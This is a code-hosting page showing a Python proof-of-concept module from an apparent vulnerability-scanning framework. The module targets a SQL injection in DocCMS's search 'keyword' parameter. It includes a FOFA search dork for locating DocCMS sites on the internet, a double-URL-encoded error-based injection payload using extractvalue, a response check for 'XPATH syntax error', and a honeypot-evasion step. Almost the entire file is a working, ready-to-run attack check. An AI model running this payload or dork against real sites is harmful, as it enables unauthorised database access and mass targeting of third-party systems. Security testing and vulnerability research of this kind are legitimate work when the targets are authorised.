openx-org/BLEN
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
8a6bd53d07e2c7daeb0782912258a47659efcdf6
BLEN/poc/DocCMS/SQLi_keyword/poc.py
openx-org 8a6bd53d07 11
2022-01-04 17:24:54 +08:00

72 lines
3.2 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "DocCMS keyword SQL注入漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "DocCMS", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
DocCMS keyword参数存在 SQL注入漏洞攻击者通过漏洞可以获取数据库信息
""", # 漏洞简要描述
"fofa-dork":"""
app="Doccms"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%36%64%25%36%34%25%33%35%25%32%38%25%33%31%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if "XPATH syntax error:" in req.text:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()
Reference in New Issue View Git Blame Copy Permalink